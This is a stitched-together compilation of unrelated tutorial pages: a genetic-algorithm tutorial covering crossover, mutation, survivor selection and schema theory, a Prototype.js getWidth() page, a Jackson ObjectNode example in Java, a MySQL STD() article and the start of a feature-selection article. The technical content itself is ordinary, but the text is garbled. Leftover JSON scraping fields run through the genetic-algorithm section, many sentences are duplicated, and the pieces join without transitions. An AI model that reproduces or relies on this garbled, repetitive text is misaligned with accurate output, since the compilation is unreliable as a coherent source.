Rank Selection also works with negative fitness values and is mostly used when the individuals in the population have very close fitness values (this happens usually at the end of the run). This leads to each individual having an almost equal share of the pie (as in the case of fitness proportionate selection), as shown in the following image, and hence each individual, no matter how fit relative to the others, has approximately the same probability of getting selected as a parent. This in turn leads to a loss in the selection pressure towards fitter individuals, making the GA make poor parent selections in such situations.

In rank selection, we remove the concept of a fitness value while selecting a parent. However, every individual in the population is ranked according to its fitness. The selection of the parents depends on the rank of each individual and not the fitness. Higher-ranked individuals are preferred over lower-ranked ones.

In random selection, we randomly select parents from the existing population. There is no selection pressure towards fitter individuals and therefore this strategy is usually avoided.

In this chapter, we will discuss what a Crossover Operator is, along with its other modules, their uses and benefits.

The crossover operator is analogous to reproduction and biological crossover. In this, more than one parent is selected and one or more off-springs are produced using the genetic material of the parents. Crossover is usually applied in a GA with a high probability – pc.

In this section we will discuss some of the most popularly used crossover operators. It is to be noted that these crossover operators are very generic and the GA designer might choose to implement a problem-specific crossover operator as well.

In one-point crossover, a random crossover point is selected and the tails of the two parents are swapped to get new off-springs.

Multi-point crossover is a generalization of the one-point crossover wherein alternating segments are swapped to get new off-springs.

In a uniform crossover, we don’t divide the chromosome into segments; rather, we treat each gene separately. In this, we essentially flip a coin for each gene to decide whether or not it will be included in the off-spring. We can also bias the coin towards one parent, to have more genetic material in the child from that parent.

Whole arithmetic recombination is commonly used for integer representations and works by taking the weighted average of the two parents using the following formulae −

Child1 = α.x + (1-α).y

Child2 = α.y + (1-α).x

Obviously, if α = 0.5, then both the children will be identical, as shown in the following image.
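One-point crossover and whole arithmetic recombination can be sketched as follows for list-encoded chromosomes (illustrative code written for this tutorial, not taken from a library).

import random

def one_point_crossover(p1, p2):
    # pick a random crossover point and swap the tails of the two parents
    point = random.randint(1, len(p1) - 1)
    return p1[:point] + p2[point:], p2[:point] + p1[point:]

def whole_arithmetic_recombination(x, y, alpha=0.5):
    # gene-by-gene weighted average of the two parents
    child1 = [alpha * a + (1 - alpha) * b for a, b in zip(x, y)]
    child2 = [alpha * b + (1 - alpha) * a for a, b in zip(x, y)]
    return child1, child2

print(one_point_crossover([0, 0, 0, 0], [1, 1, 1, 1]))
print(whole_arithmetic_recombination([1, 2, 3], [3, 2, 1]))   # alpha = 0.5 gives identical children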
}, { "code": null, "e": 26675, "s": 26517, "text": "OX1 is used for permutation based crossovers with the intention of transmitting information about relative ordering to the off-springs. It works as follows −" }, { "code": null, "e": 26804, "s": 26675, "text": "Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring." }, { "code": null, "e": 26933, "s": 26804, "text": "Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring." }, { "code": null, "e": 27104, "s": 26933, "text": "Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list." }, { "code": null, "e": 27275, "s": 27104, "text": "Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list." }, { "code": null, "e": 27336, "s": 27275, "text": "Repeat for the second child with the parent’s role reversed." }, { "code": null, "e": 27397, "s": 27336, "text": "Repeat for the second child with the parent’s role reversed." }, { "code": null, "e": 27543, "s": 27397, "text": "There exist a lot of other crossovers like Partially Mapped Crossover (PMX), Order based crossover (OX2), Shuffle Crossover, Ring Crossover, etc." }, { "code": null, "e": 27848, "s": 27543, "text": "In simple terms, mutation may be defined as a small random tweak in the chromosome, to get a new solution. It is used to maintain and introduce diversity in the genetic population and is usually applied with a low probability – pm. If the probability is very high, the GA gets reduced to a random search." }, { "code": null, "e": 28039, "s": 27848, "text": "Mutation is the part of the GA which is related to the “exploration” of the search space. It has been observed that mutation is essential to the convergence of the GA while crossover is not." }, { "code": null, "e": 28298, "s": 28039, "text": "In this section, we describe some of the most commonly used mutation operators. Like the crossover operators, this is not an exhaustive list and the GA designer might find a combination of these approaches or a problem-specific mutation operator more useful." }, { "code": null, "e": 28411, "s": 28298, "text": "In this bit flip mutation, we select one or more random bits and flip them. This is used for binary encoded GAs." }, { "code": null, "e": 28590, "s": 28411, "text": "Random Resetting is an extension of the bit flip for the integer representation. In this, a random value from the set of permissible values is assigned to a randomly chosen gene." }, { "code": null, "e": 28736, "s": 28590, "text": "In swap mutation, we select two positions on the chromosome at random, and interchange the values. This is common in permutation based encodings." }, { "code": null, "e": 28922, "s": 28736, "text": "Scramble mutation is also popular with permutation representations. In this, from the entire chromosome, a subset of genes is chosen and their values are scrambled or shuffled randomly." }, { "code": null, "e": 29087, "s": 28922, "text": "In inversion mutation, we select a subset of genes like in scramble mutation, but instead of shuffling the subset, we merely invert the entire string in the subset." 
}, { "code": null, "e": 29389, "s": 29087, "text": "The Survivor Selection Policy determines which individuals are to be kicked out and which are to be kept in the next generation. It is crucial as it should ensure that the fitter individuals are not kicked out of the population, while at the same time diversity should be maintained in the population." }, { "code": null, "e": 29625, "s": 29389, "text": "Some GAs employ Elitism. In simple terms, it means the current fittest member of the population is always propagated to the next generation. Therefore, under no circumstance can the fittest member of the current population be replaced." }, { "code": null, "e": 29801, "s": 29625, "text": "The easiest policy is to kick random members out of the population, but such an approach frequently has convergence issues, therefore the following strategies are widely used." }, { "code": null, "e": 30079, "s": 29801, "text": "In Age-Based Selection, we don’t have a notion of a fitness. It is based on the premise that each individual is allowed in the population for a finite generation where it is allowed to reproduce, after that, it is kicked out of the population no matter how good its fitness is." }, { "code": null, "e": 30358, "s": 30079, "text": "For instance, in the following example, the age is the number of generations for which the individual has been in the population. The oldest members of the population i.e. P4 and P7 are kicked out of the population and the ages of the rest of the members are incremented by one." }, { "code": null, "e": 30650, "s": 30358, "text": "In this fitness based selection, the children tend to replace the least fit individuals in the population. The selection of the least fit individuals may be done using a variation of any of the selection policies described before – tournament selection, fitness proportionate selection, etc." }, { "code": null, "e": 30906, "s": 30650, "text": "For example, in the following image, the children replace the least fit individuals P1 and P10 of the population. It is to be noted that since P1 and P9 have the same fitness value, the decision to remove which individual from the population is arbitrary." }, { "code": null, "e": 31323, "s": 30906, "text": "The termination condition of a Genetic Algorithm is important in determining when a GA run will end. It has been observed that initially, the GA progresses very fast with better solutions coming in every few iterations, but this tends to saturate in the later stages where the improvements are very small. We usually want a termination condition such that our solution is close to the optimal, at the end of the run." }, { "code": null, "e": 31386, "s": 31323, "text": "Usually, we keep one of the following termination conditions −" }, { "code": null, "e": 31457, "s": 31386, "text": "When there has been no improvement in the population for X iterations." }, { "code": null, "e": 31506, "s": 31457, "text": "When we reach an absolute number of generations." }, { "code": null, "e": 31581, "s": 31506, "text": "When the objective function value has reached a certain pre-defined value." }, { "code": null, "e": 31894, "s": 31581, "text": "For example, in a genetic algorithm we keep a counter which keeps track of the generations for which there has been no improvement in the population. Initially, we set this counter to zero. Each time we don’t generate off-springs which are better than the individuals in the population, we increment the counter." 
}, { "code": null, "e": 32060, "s": 31894, "text": "However, if the fitness any of the off-springs is better, then we reset the counter to zero. The algorithm terminates when the counter reaches a predetermined value." }, { "code": null, "e": 32251, "s": 32060, "text": "Like other parameters of a GA, the termination condition is also highly problem specific and the GA designer should try out various options to see what suits his particular problem the best." }, { "code": null, "e": 32619, "s": 32251, "text": "Till now in this tutorial, whatever we have discussed corresponds to the Darwinian model of evolution – natural selection and genetic variation through recombination and mutation. In nature, only the information contained in the individual’s genotype can be transmitted to the next generation. This is the approach which we have been following in the tutorial so far." }, { "code": null, "e": 32902, "s": 32619, "text": "However, other models of lifetime adaptation – Lamarckian Model and Baldwinian Model also do exist. It is to be noted that whichever model is the best, is open for debate and the results obtained by researchers show that the choice of lifetime adaptation is highly problem specific." }, { "code": null, "e": 33128, "s": 32902, "text": "Often, we hybridize a GA with local search – like in Memetic Algorithms. In such cases, one might choose do go with either Lamarckian or Baldwinian Model to decide what to do with individuals generated after the local search." }, { "code": null, "e": 33324, "s": 33128, "text": "The Lamarckian Model essentially says that the traits which an individual acquires in his/her lifetime can be passed on to its offspring. It is named after French biologist Jean-Baptiste Lamarck." }, { "code": null, "e": 33606, "s": 33324, "text": "Even though, natural biology has completely disregarded Lamarckism as we all know that only the information in the genotype can be transmitted. However, from a computation view point, it has been shown that adopting the Lamarckian model gives good results for some of the problems." }, { "code": null, "e": 33768, "s": 33606, "text": "In the Lamarckian model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it becomes the offspring." }, { "code": null, "e": 34139, "s": 33768, "text": "The Baldwinian model is an intermediate idea named after James Mark Baldwin (1896). In the Baldwin model, the chromosomes can encode a tendency of learning beneficial behaviors. This means, that unlike the Lamarckian model, we don’t transmit the acquired traits to the next generation, and neither do we completely ignore the acquired traits like in the Darwinian Model." }, { "code": null, "e": 34307, "s": 34139, "text": "The Baldwin Model is in the middle of these two extremes, wherein the tendency of an individual to acquire certain traits is encoded rather than the traits themselves." }, { "code": null, "e": 34690, "s": 34307, "text": "In this Baldwinian Model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it only assigns the improved fitness to the chromosome and does not modify the chromosome itself. The change in fitness signifies the chromosomes capability to “acquire the trait”, even though it is not passed directly to the future generations." }, { "code": null, "e": 34918, "s": 34690, "text": "GAs are very general in nature, and just applying them to any optimization problem wouldn’t give good results. 
GAs are very general in nature, and just applying them to any optimization problem wouldn’t give good results. In this section, we describe a few points which would help and assist a GA designer or GA implementer in their work.

It has been observed that the more problem-specific domain knowledge we incorporate into the GA, the better objective values we get. Adding problem-specific information can be done by using problem-specific crossover or mutation operators, custom representations, etc.

The following image shows Michalewicz’s (1990) view of the EA −

Crowding happens when a highly fit chromosome gets to reproduce a lot, and in a few generations the entire population is filled with similar solutions having similar fitness. This reduces diversity, which is a very crucial element for ensuring the success of a GA. There are numerous ways to limit crowding. Some of them are −

Mutation to introduce diversity.

Switching to rank selection and tournament selection, which have more selection pressure than fitness proportionate selection for individuals with similar fitness.

Fitness Sharing − In this, an individual’s fitness is reduced if the population already contains similar individuals.

It has been experimentally observed that the best solutions are driven by randomized chromosomes, as they impart diversity to the population. The GA implementer should be careful to keep a sufficient amount of randomization and diversity in the population for the best results.

Local search refers to checking the solutions in the neighborhood of a given solution to look for better objective values. It may sometimes be useful to hybridize the GA with local search. The following image shows the various places in which local search can be introduced in a GA.

In genetic algorithms, there is no “one size fits all” or a magic formula which works for all problems. Even after the initial GA is ready, it takes a lot of time and effort to play around with parameters like the population size, mutation and crossover probability, etc. to find the ones which suit the particular problem.

In this section, we introduce some advanced topics in Genetic Algorithms. A reader looking for just an introduction to GAs may choose to skip this section.
Constrained Optimization Problems are those optimization problems in which we have to maximize or minimize a given objective function value subject to certain constraints. Therefore, not all results in the solution space are feasible, and the solution space contains feasible regions as shown in the following image.

In such a scenario, crossover and mutation operators might give us solutions which are infeasible. Therefore, additional mechanisms have to be employed in the GA when dealing with constrained optimization problems.

Some of the most common methods are listed below (a small penalty-function sketch follows the list) −

Using penalty functions which reduce the fitness of infeasible solutions, preferably so that the fitness is reduced in proportion to the number of constraints violated or the distance from the feasible region.

Using repair functions which take an infeasible solution and modify it so that the violated constraints get satisfied.

Not allowing infeasible solutions to enter the population at all.

Using a special representation or decoder functions that ensure the feasibility of the solutions.
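As an illustration of the first method, a penalty proportional to the number of violated constraints can be subtracted from the objective. This is a generic sketch written for this tutorial; the constraints are hypothetical predicate functions and the penalty weight is an arbitrary choice.

def penalized_fitness(solution, objective, constraints, penalty_per_violation=1000.0):
    # count how many constraints the solution violates
    violations = sum(1 for constraint in constraints if not constraint(solution))
    # reduce the fitness in proportion to the number of violated constraints
    return objective(solution) - penalty_per_violation * violations

# toy usage: maximize x + y subject to x + y <= 10
objective = lambda s: s[0] + s[1]
constraints = [lambda s: s[0] + s[1] <= 10]
print(penalized_fitness([4, 3], objective, constraints))   # 7 (feasible, no penalty)
print(penalized_fitness([8, 9], objective, constraints))   # -983 (infeasible, penalized)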
}, { "code": null, "e": 39980, "s": 39908, "text": "Order of a schema is the number of specified fixed positions in a gene." }, { "code": null, "e": 40052, "s": 39980, "text": "Order of a schema is the number of specified fixed positions in a gene." }, { "code": null, "e": 40136, "s": 40052, "text": "Defining length is the distance between the two furthest fixed symbols in the gene." }, { "code": null, "e": 40220, "s": 40136, "text": "Defining length is the distance between the two furthest fixed symbols in the gene." }, { "code": null, "e": 40379, "s": 40220, "text": "The schema theorem states that this schema with above average fitness, short defining length and lower order is more likely to survive crossover and mutation." }, { "code": null, "e": 40687, "s": 40379, "text": "Building Blocks are low order, low defining length schemata with the above given average fitness. The building block hypothesis says that such building blocks serve as a foundation for the GAs success and adaptation in GAs as it progresses by successively identifying and recombining such “building blocks”." }, { "code": null, "e": 40946, "s": 40687, "text": "Wolpert and Macready in 1997 published a paper titled \"No Free Lunch Theorems for Optimization.\" It essentially states that if we average over the space of all possible problems, then all non-revisiting black box algorithms will exhibit the same performance." }, { "code": null, "e": 41127, "s": 40946, "text": "It means that the more we understand a problem, our GA becomes more problem specific and gives better performance, but it makes up for that by performing poorly for other problems." }, { "code": null, "e": 41382, "s": 41127, "text": "Genetic Algorithms also find application in Machine Learning. Classifier systems are a form of genetics-based machine learning (GBML) system that are frequently used in the field of machine learning. GBML methods are a niche approach to machine learning." }, { "code": null, "e": 41425, "s": 41382, "text": "There are two categories of GBML systems −" }, { "code": null, "e": 41546, "s": 41425, "text": "The Pittsburg Approach − In this approach, one chromosome encoded one solution, and so fitness is assigned to solutions." }, { "code": null, "e": 41667, "s": 41546, "text": "The Pittsburg Approach − In this approach, one chromosome encoded one solution, and so fitness is assigned to solutions." }, { "code": null, "e": 41798, "s": 41667, "text": "The Michigan Approach − one solution is typically represented by many chromosomes and so fitness is assigned to partial solutions." }, { "code": null, "e": 41929, "s": 41798, "text": "The Michigan Approach − one solution is typically represented by many chromosomes and so fitness is assigned to partial solutions." }, { "code": null, "e": 42073, "s": 41929, "text": "It should be kept in mind that the standard issue like crossover, mutation, Lamarckian or Darwinian, etc. are also present in the GBML systems." }, { "code": null, "e": 42219, "s": 42073, "text": "Genetic Algorithms are primarily used in optimization problems of various kinds, but they are frequently used in other application areas as well." }, { "code": null, "e": 42323, "s": 42219, "text": "In this section, we list some of the areas in which Genetic Algorithms are frequently used. 
These are −

Optimization − Genetic Algorithms are most commonly used in optimization problems wherein we have to maximize or minimize a given objective function value under a given set of constraints. The approach to solving optimization problems has been highlighted throughout the tutorial.

Economics − GAs are also used to characterize various economic models like the cobweb model, game theory equilibrium resolution, asset pricing, etc.

Neural Networks − GAs are also used to train neural networks, particularly recurrent neural networks.

Parallelization − GAs also have very good parallel capabilities, and prove to be a very effective means of solving certain problems; they also provide a good area for research.

Image Processing − GAs are used for various digital image processing (DIP) tasks as well, like dense pixel matching.

Vehicle Routing Problems − With multiple soft time windows, multiple depots and a heterogeneous fleet.

Scheduling Applications − GAs are used to solve various scheduling problems as well, particularly the timetabling problem.

Machine Learning − As already discussed, genetics-based machine learning (GBML) is a niche area in machine learning.

Robot Trajectory Generation − GAs have been used to plan the path which a robot arm takes by moving from one point to another.
}, { "code": null, "e": 45033, "s": 44905, "text": "Parametric Design of Aircraft − GAs have been used to design aircrafts by varying the parameters and evolving better solutions." }, { "code": null, "e": 45161, "s": 45033, "text": "Parametric Design of Aircraft − GAs have been used to design aircrafts by varying the parameters and evolving better solutions." }, { "code": null, "e": 45272, "s": 45161, "text": "DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample." }, { "code": null, "e": 45383, "s": 45272, "text": "DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample." }, { "code": null, "e": 45529, "s": 45383, "text": "Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions." }, { "code": null, "e": 45675, "s": 45529, "text": "Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions." }, { "code": null, "e": 45852, "s": 45675, "text": "Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem using novel crossover and packing strategies." }, { "code": null, "e": 46029, "s": 45852, "text": "Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem using novel crossover and packing strategies." }, { "code": null, "e": 46172, "s": 46029, "text": "The following books can be referred to further enhance the reader’s knowledge of Genetic Algorithms, and Evolutionary Computation in general −" }, { "code": null, "e": 46258, "s": 46172, "text": "Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg." }, { "code": null, "e": 46344, "s": 46258, "text": "Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg." }, { "code": null, "e": 46430, "s": 46344, "text": "Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz." }, { "code": null, "e": 46516, "s": 46430, "text": "Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz." }, { "code": null, "e": 46584, "s": 46516, "text": "Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt." }, { "code": null, "e": 46652, "s": 46584, "text": "Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt." }, { "code": null, "e": 46729, "s": 46652, "text": "Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb." }, { "code": null, "e": 46806, "s": 46729, "text": "Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb." }, { "code": null, "e": 46813, "s": 46806, "text": " Print" }, { "code": null, "e": 46824, "s": 46813, "text": " Add Notes" } ]
Prototype - getWidth() Method
This method finds and returns the computed width of an element.

This method returns correct values on elements whose display is set to none, either in an inline style rule or in a CSS stylesheet.

Note that the value returned is a number only, although it is expressed in pixels.

element.getWidth();

It returns the computed width of an element.

<html>
   <head>
      <title>Prototype examples</title>
      <script type = "text/javascript" src = "/javascript/prototype.js"></script>
      
      <script>
         function showResult() {
            var width = $('rectangle').getWidth();
            alert("Element width is " + width );
         }
      </script>
   </head>

   <body>
      <p>Click the button to see the result.</p>
      
      <div id = "rectangle" 
         style = "font-size: 10px; width: 20em; height: 10em">
         <p>This is the paragraph.</p>
      </div>
      <br />
      
      <input type = "button" value = "showResult" onclick = "showResult();"/>
   </body>
</html>

Click the button to see the result.

This is the paragraph.
[ { "code": null, "e": 2122, "s": 2061, "text": "This method finds and returns the computed width of element." }, { "code": null, "e": 2254, "s": 2122, "text": "This method returns correct values on elements whose display is set to none either in an inline style rule or in an CSS stylesheet." }, { "code": null, "e": 2336, "s": 2254, "text": "Note that the value returned is a number only although it is expressed in pixels." }, { "code": null, "e": 2357, "s": 2336, "text": "element.getWidth();\n" }, { "code": null, "e": 2402, "s": 2357, "text": "It returns the computed width of an element." }, { "code": null, "e": 3062, "s": 2402, "text": "<html>\n <head>\n <title>Prototype examples</title>\n <script type = \"text/javascript\" src = \"/javascript/prototype.js\"></script>\n \n <script>\n function showResult() {\n var width = $('rectangle').getWidth();\n alert(\"Element width is \" + width );\n }\n </script>\n </head>\n\n <body>\n <p>Click the button to see the result.</p>\n \n <div id = \"rectangle\" \n style = \"font-size: 10px; width: 20em; height 10em\">\n <p>This is the paragraph.</p>\n </div>\n <br />\n \n <input type = \"button\" value = \"showResult\" onclick = \"showResult();\"/>\n </body>\n</html>" }, { "code": null, "e": 3098, "s": 3062, "text": "Click the button to see the result." }, { "code": null, "e": 3121, "s": 3098, "text": "This is the paragraph." }, { "code": null, "e": 3158, "s": 3121, "text": "\n 127 Lectures \n 11.5 hours \n" }, { "code": null, "e": 3180, "s": 3158, "text": " Aleksandar Cucukovic" }, { "code": null, "e": 3187, "s": 3180, "text": " Print" }, { "code": null, "e": 3198, "s": 3187, "text": " Add Notes" } ]
How to search a value inside a JSON file using Jackson in Java?
The com.fasterxml.jackson.databind.node.ObjectNode class can be used to map the JSON object structure in JSON content. We can search for a particular value inside the JSON file using the get() method of the ObjectNode class; this method is used for accessing the value of a specified field of an object node.

public JsonNode get(String fieldName)

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.node.ObjectNode;
public class ObjectNodeTest {
   public static void main(String args[]) throws Exception {
      String jsonString = "{\"Id\":101, \"name\":\"Raja Ramesh\", \"address\":\"Madhapur\"}";
      ObjectMapper mapper = new ObjectMapper();
      ObjectNode node = mapper.readValue(jsonString, ObjectNode.class);
      if(node.has("name")) {
         System.out.println("NAME: " + node.get("name"));
      }
   }
}

NAME: "Raja Ramesh"
[ { "code": null, "e": 1364, "s": 1062, "text": "The com.fasterxml.jackson.databind.node.ObjectNode class can be used to map the JSON object structure in Json content. We can search for a particular value inside the JSON file using the get() method of ObjectNode class, this method used for accessing the value of a specified field of an object node." }, { "code": null, "e": 1402, "s": 1364, "text": "public JsonNode get(String fieldName)" }, { "code": null, "e": 1916, "s": 1402, "text": "import com.fasterxml.jackson.databind.ObjectMapper;\nimport com.fasterxml.jackson.databind.node.ObjectNode;\npublic class ObjectNodeTest {\n public static void main(String args[]) throws Exception {\n String jsonString = \"{\\\"Id\\\":101, \\\"name\\\":\\\"Raja Ramesh\\\", \\\"address\\\":\\\"Madhapur\\\"}\";\n ObjectMapper mapper = new ObjectMapper();\n ObjectNode node = mapper.readValue(jsonString, ObjectNode.class);\n if(node.has(\"name\")) {\n System.out.println(\"NAME: \" + node.get(\"name\"));\n }\n }\n}" }, { "code": null, "e": 1936, "s": 1916, "text": "NAME: \"Raja Ramesh\"" } ]
STD() function in MySQL - GeeksforGeeks
11 Jan, 2021

With the help of the STD() function we can calculate the population standard deviation of an expression in MySQL. If there are no matching rows in the given expression, it returns NULL.

Syntax :

STD(expr);

Parameter : This method accepts only one parameter.

expr : Input expression from which we want to calculate the population standard deviation.

Returns : It returns the population standard deviation.

Example-1 : Finding the population standard deviation of the RunScored column from the given Player table using the STD() function.

Creating a Player table :

CREATE TABLE Player 
(
PlayerId INT AUTO_INCREMENT, 
PlayerName VARCHAR(100) NOT NULL,
RunScored INT NOT NULL,
WicketsTaken INT NOT NULL,
PRIMARY KEY(PlayerId)
);

Inserting data into the table. To verify, use the following command.

SELECT * from Player ;

Output :

Now we are going to find the population standard deviation for the RunScored column.

SELECT STD(RunScored) as Pop_Standard_Deviation 
FROM Player ;

Output :

Example-2 : Now we are going to find the population standard deviation of the WicketsTaken column.

SELECT STD(WicketsTaken) as Pop_Std_Dev_Wickets 
FROM Player ;

Output :

Example-3 : In this example we are going to find the population standard deviation of the income of the employees who are working in the location ‘Kolkata’. To demonstrate, create a table named EmployeeDetails.

CREATE TABLE EmployeeDetails(
Employee_Id INT AUTO_INCREMENT, 
Employee_Name VARCHAR(100) NOT NULL,
Working_At VARCHAR(20) NOT NULL,
Work_Location VARCHAR(20) NOT NULL,
Joining_Date DATE NOT NULL,
Annual_Income INT NOT NULL,
PRIMARY KEY(Employee_Id )
);

Inserting data into the table :

INSERT INTO 
EmployeeDetails(Employee_Name, Working_At, Work_Location, Joining_Date, Annual_Income )
VALUES
('Amit Khan', 'XYZ Digital', 'Kolkata', '2019-10-06', 350000 ),
('Shreetama Pal', 'ABC Corp.', 'Kolkata', '2018-12-16', 500000 ),
('Aniket Sharma', 'PQR Soln.', 'Delhi', '2020-01-11', 300000 ),
('Maitree Jana', 'XYZ Digital', 'Kolkata', '2019-05-01', 400000 ),
('Priyanka Ojha', 'ABC Corp.', 'Delhi', '2019-02-13', 350000 ),
('Sayani Mitra', 'XYZ Digital', 'Kolkata', '2019-09-15', 320000 ),
('Nitin Dey', 'PQR Soln.', 'Delhi', '2019-10-06', 250000 ),
('Sujata Samanta', 'PQR Soln.', 'Kolkata', '2020-10-06', 350000 ),
('Sudip Majhi', 'ABC Corp.', 'Delhi', '2018-10-30', 600000 ),
('Sanjoy Kohli', 'XYZ Digital', 'Delhi', '2019-04-18', 450000 ) ;

To verify, use the following command.

Select * FROM EmployeeDetails;

Output :

Now we are going to find the population standard deviation of the annual income for those employees whose work location is ‘Kolkata’.

SELECT 'Kolkata' AS 'Work_Location',
STD(Annual_Income) as PopStdDevOfAnnualIncome 
FROM EmployeeDetails where Work_Location = 'Kolkata';

Output :
[ { "code": null, "e": 23877, "s": 23849, "text": "\n11 Jan, 2021" }, { "code": null, "e": 24059, "s": 23877, "text": "With the help of STD() function we can calculate population Standard deviation of an expression in MySQL. But, if there are no matching rows in the given expression it returns Null." }, { "code": null, "e": 24068, "s": 24059, "text": "Syntax :" }, { "code": null, "e": 24079, "s": 24068, "text": "STD(expr);" }, { "code": null, "e": 24131, "s": 24079, "text": "Parameter : This method accepts only one parameter." }, { "code": null, "e": 24218, "s": 24131, "text": "expr : Input expression from which we want to calculate population standard deviation." }, { "code": null, "e": 24274, "s": 24218, "text": "Returns : It returns the population standard deviation." }, { "code": null, "e": 24391, "s": 24274, "text": "Example-1 :Finding population standard deviation of RunScored column from the given Player table using STD Function." }, { "code": null, "e": 24417, "s": 24391, "text": "Creating a Player table :" }, { "code": null, "e": 24582, "s": 24417, "text": "CREATE TABLE Player \n(\nPlayerId INT AUTO_INCREMENT, \nPlayerName VARCHAR(100) NOT NULL,\nRunScored INT NOT NULL,\nWicketsTaken INT NOT NULL,\nPRIMARY KEY(PlayerId)\n);" }, { "code": null, "e": 24662, "s": 24582, "text": "Inserting data into the Table :To verify used the following command as follows." }, { "code": null, "e": 24686, "s": 24662, "text": "SELECT * from Player ;" }, { "code": null, "e": 24695, "s": 24686, "text": "Output :" }, { "code": null, "e": 24772, "s": 24695, "text": "Now we are going to find population standard deviation for RunScored column." }, { "code": null, "e": 24838, "s": 24772, "text": "SELECT STD(RunScored ) as Pop_Standard_Deviation \nFROM Player ;\n" }, { "code": null, "e": 24847, "s": 24838, "text": "Output :" }, { "code": null, "e": 24937, "s": 24847, "text": "Example-2 :Now we are going to find population standard deviation of WicketsTaken column." }, { "code": null, "e": 25004, "s": 24937, "text": "SELECT STD(WicketsTaken) as Pop_Std_Dev_Wickets \nFROM Player ;\n" }, { "code": null, "e": 25013, "s": 25004, "text": "Output :" }, { "code": null, "e": 25211, "s": 25013, "text": "Example-3 :In this example we are going to find the population standard deviation of Income of Employee who are working in the location ‘Kolkata’ To demonstrate create a table named EmloyeeDetails." 
}, { "code": null, "e": 25469, "s": 25211, "text": "CREATE TABLE EmployeeDetails(\n\nEmployee_Id INT AUTO_INCREMENT, \nEmployee_Name VARCHAR(100) NOT NULL,\nWorking_At VARCHAR(20) NOT NULL,\nWork_Location VARCHAR(20) NOT NULL,\nJoining_Date DATE NOT NULL,\nAnnual_Income INT NOT NULL,\nPRIMARY KEY(Employee_Id )\n);" }, { "code": null, "e": 25501, "s": 25469, "text": "Inserting data into the Table :" }, { "code": null, "e": 26258, "s": 25501, "text": "INSERT INTO \nEmployeeDetails(Employee_Name, Working_At, Work_Location, Joining_Date, Annual_Income )\n\nVALUES\n('Amit Khan', 'XYZ Digital', 'Kolkata', '2019-10-06', 350000 ),\n('Shreetama Pal', 'ABC Corp.', 'Kolkata', '2018-12-16', 500000 ),\n('Aniket Sharma', 'PQR Soln.', 'Delhi', '2020-01-11', 300000 ),\n('Maitree Jana', 'XYZ Digital', 'Kolkata', '2019-05-01', 400000 ),\n('Priyanka Ojha', 'ABC Corp.', 'Delhi', '2019-02-13', 350000 ),\n('Sayani Mitra', 'XYZ Digital', 'Kolkata', '2019-09-15', 320000 ),\n('Nitin Dey', 'PQR Soln.', 'Delhi', '2019-10-06', 250000 ),\n('Sujata Samanta', 'PQR Soln.', 'Kolkata', '2020-10-06', 350000 ),\n('Sudip Majhi', 'ABC Corp.', 'Delhi', '2018-10-30', 600000 ),\n('Sanjoy Kohli', 'XYZ Digital', 'Delhi', '2019-04-18', 450000 ) ;" }, { "code": null, "e": 26307, "s": 26258, "text": "To verify used the following command as follows." }, { "code": null, "e": 26339, "s": 26307, "text": "Select * FROM EmployeeDetails;\n" }, { "code": null, "e": 26348, "s": 26339, "text": "Output :" }, { "code": null, "e": 26472, "s": 26348, "text": "Now we are going to find population standard deviation of annual Income for those Employee whose work location is ‘Kolkata’" }, { "code": null, "e": 26613, "s": 26472, "text": "SELECT 'Kolkata' AS 'Work_Location',\nSTD(Annual_Income) as PopStdDevOfAnnualIncome \nFROM EmployeeDetails where Work_Location = 'Kolkata';\n" }, { "code": null, "e": 26622, "s": 26613, "text": "Output :" }, { "code": null, "e": 26631, "s": 26622, "text": "DBMS-SQL" }, { "code": null, "e": 26637, "s": 26631, "text": "mysql" }, { "code": null, "e": 26641, "s": 26637, "text": "SQL" }, { "code": null, "e": 26645, "s": 26641, "text": "SQL" }, { "code": null, "e": 26743, "s": 26645, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26752, "s": 26743, "text": "Comments" }, { "code": null, "e": 26765, "s": 26752, "text": "Old Comments" }, { "code": null, "e": 26831, "s": 26765, "text": "How to Update Multiple Columns in Single Update Statement in SQL?" }, { "code": null, "e": 26863, "s": 26831, "text": "What is Temporary Table in SQL?" }, { "code": null, "e": 26941, "s": 26863, "text": "SQL Query to Find the Name of a Person Whose Name Starts with Specific Letter" }, { "code": null, "e": 26958, "s": 26941, "text": "SQL using Python" }, { "code": null, "e": 26973, "s": 26958, "text": "SQL | Subquery" }, { "code": null, "e": 27039, "s": 26973, "text": "How to Write a SQL Query For a Specific Date Range and Date Time?" }, { "code": null, "e": 27075, "s": 27039, "text": "SQL Query to Convert VARCHAR to INT" }, { "code": null, "e": 27110, "s": 27075, "text": "SQL Query to Delete Duplicate Rows" }, { "code": null, "e": 27141, "s": 27110, "text": "SQL Query to Compare Two Dates" } ]
Feature Selection with Genetic Algorithms | by Zachary Warnes | Towards Data Science
A genetic algorithm is a technique for optimization problems based on natural selection. In this post, I show how to use genetic algorithms for feature selection.

While there are many well-known feature selection methods in scikit-learn, feature selection goes well beyond what is available there.

Feature selection is a crucial aspect of any machine learning pipeline. However, these days there is a surplus of available data. As a consequence, there is often a surplus of features.

